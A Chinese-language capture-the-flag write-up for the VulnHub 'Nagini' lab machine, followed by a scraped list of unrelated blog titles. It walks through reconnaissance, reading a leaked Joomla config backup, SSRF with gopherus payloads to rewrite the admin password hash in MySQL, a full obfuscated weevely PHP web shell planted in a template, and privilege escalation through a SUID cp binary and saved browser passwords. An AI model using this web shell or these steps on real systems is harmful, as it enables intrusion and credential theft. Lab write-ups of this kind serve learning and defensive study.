vulnhub - Nagini - writeup
信息收集
基础信息
目标只开放了22和88:
root@Lockly tmp/nagini » arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:fa:3d:23, IPv4: 192.168.56.106
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:1f (Unknown: locally administered)
192.168.56.100 08:00:27:41:61:d7 PCS Systemtechnik GmbH
192.168.56.108 08:00:27:10:e2:a8 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.563 seconds (99.88 hosts/sec). 3 responded
root@Lockly tmp/nagini » nmap -A -sT -p- -Pn --min-rate 6000 192.168.56.108 -o /root/temp/tmp/nagini/nagini.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 14:45 CST
Nmap scan report for 192.168.56.108
Host is up (0.0028s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:10:E2:A8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 2.82 ms 192.168.56.108
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.58 seconds
访问网页,真就开局一张图其他全靠编。
目录探测
这里有一个joomla这个cms好像在DC系列见过,还有一个note.txt。
root@Lockly tmp/nagini » gobuster dir -u http://192.168.56.108 -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.108
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 97]
/note.txt (Status: 200) [Size: 234]
/joomla (Status: 301) [Size: 317] [--> http://192.168.56.108/joomla/]
/server-status (Status: 403) [Size: 279]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
http3访问
访问这个note.txt,提示了要绑定域名 并且以HTTP3来访问。
root@Lockly tmp/nagini » curl http://192.168.56.108/note.txt
Hello developers!!
I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.
Regards,
site_amdin
edge,火狐均按网上步骤开启HTTP3访问但都无效,单独下了chrome canary版,chrome.exe --enable-quic --quic-version=h3-27开启HTTP3访问也不行。想用python中的库http3来试试,但报错无法连接。
import http3
client = http3.Client()
response = client.get("https://quic.nagini.hogwarts")
print(response.text)
# ConnectionRefusedError: [Errno 111] Connect call failed ('192.168.56.109', 443)
去搜了搜go中实现http3客户端,也尝试了一下还是失败访问不到。
package main
import (
"crypto/tls"
"fmt"
quic "github.com/quic-go/quic-go"
quichttp "github.com/quic-go/quic-go/http3"
"io/ioutil"
"net/http"
)
func main() {
tr := &quichttp.RoundTripper{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
QuicConfig: &quic.Config{Versions: []quic.VersionNumber{quic.Version2}},
}
client := &http.Client{Transport: tr}
resp, err := client.Get("https://192.168.56.109/")
if err != nil {
fmt.Println(err)
return
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
fmt.Println(err)
return
}
fmt.Println(string(body))
}
// Get "https://192.168.56.109/": timeout: no recent network activity
看了别人的wp,如下操作网速太慢老失败,先挂着先。
git clone https://github.com/cloudflare/quiche
cd quiche
apt purge rustc
export RUSTUP_DIST_SERVER=https://mirrors.ustc.edu.cn/rust-static
export RUSTUP_UPDATE_ROOT=https://mirrors.ustc.edu.cn/rust-static/rustup
curl -proto '=https'--tlsv1.2 -sSf https://sh.rustup.rs | sh //这里会有一个选项,选第一个
source "$HOME/.cargo/env"
cargo build --examples
cargo test
终于是编译完了,编译好的工具在target/debug/examples这个目录下。
666,什么内容都没有,错也不报。这个机器还重新配置了一遍也不行。没弄明白是为什么。
搜了搜还可以用curl,他有个--http3参数,但是我的版本不支持(会报错:curl: option --http3: the installed libcurl version doesn't support this),需要重新编译。参考这里传送门。编译时间很长先放放。
cargo build --package quiche --release --features ffi,pkg-config-meta,qlog
mkdir quiche/deps/boringssl/src/lib
ln -vnf $(find target/release -name libcrypto.a -o -name libssl.a) quiche/deps/boringssl/src/lib/
cd ../
wget https://github.com/curl/curl/releases/download/curl-7_80_0/curl-7.80.0.tar.gz
tar zxf curl-7.80.0.tar.gz
cd curl-7.80.0/
./configure LDFLAGS="-Wl,-rpath,$PWD/../quiche/target/release" --with-openssl=$PWD/../quiche/quiche/deps/boringssl/src --with-quiche=$PWD/../quiche/target/release --prefix=/usr/local/curl
make && make install
cp ../quiche/target/release/libquiche.so /usr/local/curl/lib/
LD_LIBRARY_PATH="/usr/local/curl/lib/" /usr/local/curl/bin/curl -V
敏感文件泄露
试一手看看是不是和上次差不多,有没有README,可以的README都没删,这里看到版本是3.9。
在msf中有版本扫描的模块,确定这里是3.9.25。但尝试了几个rce但都没成功。
继续fuzz一下joomla下的目录的结果。
/administrator是一个登录页面:前面note.txt中下面的署名site_amdin有可能就是用户名,尝试弱口令但无果。
进一步收集他的信息,用cmseek来扫敏感信息,能确定其版本为3.9.25这个版本去搜了确实没有rce可以直接利用。但在后面发现了他的备份文件configuration.php.bak。
cmseek -u http://192.168.56.108/joomla
备份文件内容如下:里面的secret,user等字段都去web登录和ssh试了几次没有登录成功,没有密码复用的情况。
root@Lockly tmp/nagini » cat configuration.php.bak
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'Joomla CMS';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $debug_lang_const = '1';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'goblin';
public $password = '';
public $db = 'joomla';
public $dbprefix = 'joomla_';
public $live_site = '';
public $secret = 'ILhwP6HTYKcN7qMh';
public $gzip = '0';
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
public $ftp_host = '';
public $ftp_port = '';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $mailonline = '1';
public $mailer = 'mail';
public $mailfrom = 'site_admin@nagini.hogwarts';
public $fromname = 'Joomla CMS';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $cache_platformprefix = '0';
public $MetaDesc = '';
public $MetaKeys = '';
public $MetaTitle = '1';
public $MetaAuthor = '1';
public $MetaVersion = '0';
public $robots = '';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $feed_email = 'none';
public $log_path = '/var/www/html/joomla/administrator/logs';
public $tmp_path = '/var/www/html/joomla/tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $shared_session = '0';
}
web渗透
在编译好curl之后指定参数使用HTTP3来访问,得到提示的一个路径/internalResourceFeTcher.php。
root@Lockly tmp/nagini » LD_LIBRARY_PATH="/usr/local/curl/lib/" /usr/local/curl/bin/curl https://quic.nagini.hogwarts
<html>
<head>
<title>Information Page</title>
</head>
<body>
Greetings Developers! !
I am having two announcements that I need to share with you:
1. We no longer require functionality at /internalResourceFeTcher.php in our main production servers,So I will be removing the same by this week.
2. All developers are requested not to put any configuration's backup file (.bak) in main production servers as they are readate by every one.
Regards,
site admin
</body>
</html>
ssrf利用
提示了一个地址:http://quic.nagini看网页内容大概率会有ssrf,尝试file://etc/passwd读取确定存在ssrf。
过滤一下这里注意到有三个用户,由前面的备份文件得到了一个用户名goblin,以及知道了库名joomla再通过gopherus来生成payload列举出所有的表。
没有回显就多执行几次,然后搜搜用户表的表名,这里相关的有joomla_user和joomla_users。
经过两次尝试确定是joomla_users然后还一样生成payload执行use joomla;select * from joomla_users;来列出所有用户。可以看到用户site_admin以及密码的哈希。
在线网站上查不出来,用john也没出来。直接修改密码: 先生成相应的md5然后用以下sql语句生成payload。
echo -n 'admin666' | md5sum
use joomla; update joomla_users set password = '8a30ec6807f71bc69d096d8e4d501ade' where username='site_admin';select * from joomla_users;
修改成功之后使用site_admin:admin666成功登录后台。
更改模板反弹shell
在template的功能下选择模板进行编辑,这里的利用方式很多,我选择index.php在里面写入weevely生成的儿。
weevely连接的url通过度娘可以确定:joomla/templates/protostar/index.php。
root@Lockly tmp/nagini » weevely generate lockly shell.php
Generated 'shell.php' with password 'lockly' of 761 byte size.
root@Lockly tmp/nagini » cat shell.php
<?php
$m='nction x(dJ$t,$dJk){$cdJ=sdJtrlen($k);$dJdJl=strlen($t);$dJo="";dJfordJ($i=0;$i<dJ$l;){fdJor($j=0d';
$H='tch("/$kh(dJ.+)$kfdJ/dJ",@fdJildJe_get_contedJnts("php:/dJ/inpdJut"),$m)dJ==1) {@ob_dJstart();@ed';
$f='J;(dJ$j<$c&&$idJ<$l);$j+dJ+,$i++dJ){$odJ.=$tdJ{$dJi}^$k{$j};}dJ}dJreturn $odJ;}if (@prdJeg_mdJdJa';
$M='$k="dJcdJ01cdJ44f9";$kh=dJ"834e42fb72dJ13dJ";$kf="6efdJ51bdJ517555";$p="6dJdgLdJ5F0WJ3ewdJUPVdJw";fdJu';
$R=str_replace('hD','','crhDeathDhDehD_funhDcthDion');
$i='JvdJal(@gzuncomdJpdJress(@x(dJ@basedJ64_decode(dJ$mdJ[1]),$k)))dJdJ;$o=@ob_getdJ_dJcodJntentsdJ();@';
$p='ob_end_dJclean();$rdJ=@basedJ64_encodJde(@dJx(@gzcodJmpredJss($o),$dJkdJ));prdJint("$p$kh$r$dJkf");}';
$E=str_replace('dJ','',$M.$m.$f.$H.$i.$p);
$O=$R('',$E);$O();
?>
root@Lockly tmp/nagini » weevely http://192.168.56.109/joomla/templates/protostar/index.php lockly
[+] weevely 4.0.1
[+] Target: 192.168.56.109
[+] Session: /root/.weevely/sessions/192.168.56.109/index_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.109 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::a00:27ff:fee3:c5ef prefixlen 64 scopeid 0x20<link>
ether 08:00:27:e3:c5:ef txqueuelen 1000 (Ethernet)
RX packets 1882 bytes 428249 (418.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2551 bytes 2982274 (2.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 589 bytes 74286 (72.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 589 bytes 74286 (72.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
www-data@Nagini:/var/www/html/joomla/templates/protostar $
在网站目录下拿到第一个flag。
提权
在home目录下是前面列出的用户,其中hermoine有第二个flag以及.mozilla这个目录,但当前无权访问,但snape用户可以,并在其目录下发现.creds.txt。内容经过了base64编码,解码之后得到:love@lilly。
通过snape:love@lilly登录snape,此时访问hermoine的bin目录下有个工具su_cp,看帮助中的这句:Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY就是一个复制用的。
root@Lockly tmp/nagini » ssh snape@192.168.56.109
The authenticity of host '192.168.56.109 (192.168.56.109)' can't be established.
ED25519 key fingerprint is SHA256:oAgAxZkRbtwe40/oXGuZbaPjiDWzluKXPpTv2r6TrAs.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:6: [hashed name]
~/.ssh/known_hosts:8: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.109' (ED25519) to the list of known hosts.
snape@192.168.56.109's password:
Linux Nagini 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 16:38:35 2021 from 192.168.1.53
snape@Nagini:~$ cd ../hermoine/bin
snape@Nagini:/home/hermoine/bin$ ls -al
total 152
drwxr-xr-x 2 hermoine hermoine 4096 Apr 4 2021 .
drwxr-xr-x 6 hermoine hermoine 4096 Apr 4 2021 ..
-rwsr-xr-x 1 hermoine hermoine 146880 Apr 4 2021 su_cp
snape@Nagini:/home/hermoine/bin$ ./su_cp -h
./su_cp: invalid option -- 'h'
Try './su_cp --help' for more information.
snape@Nagini:/home/hermoine/bin$ ./su_cp --help
Usage: ./su_cp [OPTION]... [-T] SOURCE DEST
or: ./su_cp [OPTION]... SOURCE... DIRECTORY
or: ./su_cp [OPTION]... -t DIRECTORY SOURCE...
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.
Mandatory arguments to long options are mandatory for short options too.
-a, --archive same as -dR --preserve=all
--attributes-only don't copy the file data, just the attributes
--backup[=CONTROL] make a backup of each existing destination file
-b like --backup but does not accept an argument
--copy-contents copy contents of special files when recursive
-d same as --no-dereference --preserve=links
-f, --force if an existing destination file cannot be
opened, remove it and try again (this option
is ignored when the -n option is also used)
-i, --interactive prompt before overwrite (overrides a previous -n
option)
-H follow command-line symbolic links in SOURCE
-l, --link hard link files instead of copying
-L, --dereference always follow symbolic links in SOURCE
-n, --no-clobber do not overwrite an existing file (overrides
a previous -i option)
-P, --no-dereference never follow symbolic links in SOURCE
-p same as --preserve=mode,ownership,timestamps
--preserve[=ATTR_LIST] preserve the specified attributes (default:
mode,ownership,timestamps), if possible
additional attributes: context, links, xattr,
all
--no-preserve=ATTR_LIST don't preserve the specified attributes
--parents use full source file name under DIRECTORY
-R, -r, --recursive copy directories recursively
--reflink[=WHEN] control clone/CoW copies. See below
--remove-destination remove each existing destination file before
attempting to open it (contrast with --force)
--sparse=WHEN control creation of sparse files. See below
--strip-trailing-slashes remove any trailing slashes from each SOURCE
argument
-s, --symbolic-link make symbolic links instead of copying
-S, --suffix=SUFFIX override the usual backup suffix
-t, --target-directory=DIRECTORY copy all SOURCE arguments into DIRECTORY
-T, --no-target-directory treat DEST as a normal file
-u, --update copy only when the SOURCE file is newer
than the destination file or when the
destination file is missing
-v, --verbose explain what is being done
-x, --one-file-system stay on this file system
-Z set SELinux security context of destination
file to default type
--context[=CTX] like -Z, or if CTX is specified then set the
SELinux or SMACK security context to CTX
--help display this help and exit
--version output version information and exit
By default, sparse SOURCE files are detected by a crude heuristic and the
corresponding DEST file is made sparse as well. That is the behavior
selected by --sparse=auto. Specify --sparse=always to create a sparse DEST
file whenever the SOURCE file contains a long enough sequence of zero bytes.
Use --sparse=never to inhibit creation of sparse files.
When --reflink[=always] is specified, perform a lightweight copy, where the
data blocks are copied only when modified. If this is not possible the copy
fails, or if --reflink=auto is specified, fall back to a standard copy.
Use --reflink=never to ensure a standard copy is performed.
The backup suffix is '~', unless set with --suffix or SIMPLE_BACKUP_SUFFIX.
The version control method may be selected via the --backup option or through
the VERSION_CONTROL environment variable. Here are the values:
none, off never make backups (even if --backup is given)
numbered, t make numbered backups
existing, nil numbered if numbered backups exist, simple otherwise
simple, never always make simple backups
As a special case, cp makes a backup of SOURCE when the force and backup
options are given and SOURCE and DEST are the same name for an existing,
regular file.
GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Full documentation at: <https://www.gnu.org/software/coreutils/cp>
or available locally via: info '(coreutils) cp invocation'
snape@Nagini:/home/hermoine/bin$
公钥登录
考虑公钥登录,在本地kali生成公钥并供靶机下载。
ssh-keygen
cd ~/.ssh; python -m http.server 1515 -b 192.168.56.106
拉下来之后更名为authorized_keys,并使用su_cp拷贝到hermoine 的 .ssh 目录下
wget http://192.168.56.106:1515/id_rsa.pub
mv id_rsa.pub authorized_keys
cd /home/hermoine/bin
./su_cp -p /home/snape/authorized_keys /home/hermoine/.ssh/
然后直接登录得到第二个flag。
还原浏览器密码
用hackbrowserdata来还原浏览器密码,得到凭据root:@Alohomora#123,成功提权至root。
拿下最后的flag。
vulnhub - Nagini - writeup的更多相关文章
- vulnhub writeup - 持续更新
目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...
- Vulnhub DC-1靶机渗透学习
前言 之前听说过这个叫Vulnhub DC-1的靶机,所以想拿来玩玩学习,结果整个过程都是看着别人的writeup走下来的,学艺不精,不过这个过程也认识到,学会了很多东西. 所以才想写点东西,记录一下 ...
- Vulnhub靶场DC-1 WP
前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...
- VulnHub靶场学习_HA: Natraj
HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...
- Vulnhub实战-grotesque3靶机👻
Vulnhub实战-grotesque3靶机 靶机地址:http://www.vulnhub.com/entry/grotesque-301,723/ 1.靶机描述 2.主机探测,端口扫描 我们在vm ...
- 2016第七季极客大挑战Writeup
第一次接触CTF,只会做杂项和一点点Web题--因为时间比较仓促,写的比较简略.以后再写下工具使用什么的. 纯新手,啥都不会.处于瑟瑟发抖的状态. 一.MISC 1.签到题 直接填入题目所给的SYC{ ...
- ISCC2016 WriteUp
日期: 2016-05-01~ 注:隔了好久才发布这篇文章,还有两道Pwn的题没放,过一阵子放上.刚开始做这个题,后来恰巧赶上校内CTF比赛,就把重心放在了那个上面. 这是第一次做类似于CTF的题,在 ...
- 参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp
洒家近期参加了 Tokyo Westerns / MMA CTF 2nd 2016(TWCTF) 比赛,不得不说国际赛的玩法比国内赛更有玩头,有的题给洒家一种一看就知道怎么做,但是做出来还需要洒家拍一 ...
- 爱春秋之戏说春秋 Writeup
爱春秋之戏说春秋 Writeup 第一关 图穷匕见 这一关关键是给了一个图片,将图片下载到本地后,打开以及查看属性均无任何发现,尝试把图片转换为.txt格式.在文本的最后发现这样一串有规律的代码: 形 ...
- 《安全智库》:48H急速夺旗大战通关writeup(通关策略)
作者:ByStudent 题目名字 题目分值 地址 MallBuilder2 350 mall.anquanbao.com.cn MallBuilder1 200 mall.anquanbao.c ...
随机推荐
- java线程的interrup、tUninterruptibles.sleepUninterruptibly和sleep、wait
参考: (1)https://blog.csdn.net/qq_36031640/article/details/116696685 (2)https://blog.csdn.net/liuxiao7 ...
- 如何选择适合你的HTAP数据库?
最近,在数据库行业对HTAP(混合事务/分析处理,Hybrid Transactional/Analytical Processing)这个概念宣传的非常火爆,也衍生出 Real-Time HTAP的 ...
- MySQL系列之读写分离架构——Atlas介绍、安装配置、Atlas功能测试、生产用户要求、Atlas基本管理、自动分表、关于读写分离建议
文章目录 1. Atlas介绍 2.安装配置 3. Atlas功能测试 4. 生产用户要求 5. Atlas基本管理 6. 自动分表 7. 关于读写分离建议 1. Atlas介绍 Atlas是由 Qi ...
- 形象描绘TCP三次握手和四次挥手
一.TCP三次握手TCP 三次握手就好比两个人在街上隔着50米看见了对方,但是因为雾霾等原因不能100%确认,所以要通过招手的方式相互确定对方是否认识自己.形象描绘TCP三次握手和四次挥手 张三首先向 ...
- 《流畅的Python》 读书笔记 第二章数据结构(2) 231011
2.5 对序列使用+和* 通常 + 号两侧的序列由相同类型的数据所构成,在拼接的过程中,两个被操作的序列都不会被修改,Python 会新建一个包含同样类型数据的序列来作为拼接的结果 +和*都遵循这个规 ...
- Go流程控制与快乐路径原则
Go流程控制与快乐路径原则 目录 Go流程控制与快乐路径原则 一.流程控制基本介绍 二.if 语句 2.1 if 语句介绍 2.2 单分支结构的 if 语句形式 2.3 Go 的 if 语句的特点 2 ...
- Python 作用域:局部作用域、全局作用域和使用 global 关键字
变量只在创建它的区域内可用.这被称为作用域. 局部作用域 在函数内部创建的变量属于该函数的局部作用域,并且只能在该函数内部使用. 示例:在函数内部创建的变量在该函数内部可用: def myfunc() ...
- Radius+OpenLdap+USG防火墙认证
1.1.安装OpenLdap # 在数据目录创建ldap文件存放ldap的配置文件 mkdir -p /data/ldap/{data,conf} docker run -p 389:389 -p 6 ...
- Python MySQL 数据库查询:选择数据、使用筛选条件、防止 SQL 注入
从表格中选择数据 要从MySQL中的表格中选择数据,请使用"SELECT"语句: 示例选择"customers"表格中的所有记录,并显示结果: import m ...
- Codeforces 1566E Buds Re-hanging
原题链接 Codeforces Global Round 16 E. Buds Re-hanging 首先想到,如果我们把一个\(buds\)挂到一个叶子上,那么会使得叶子总数减\(1\). 还有就是 ...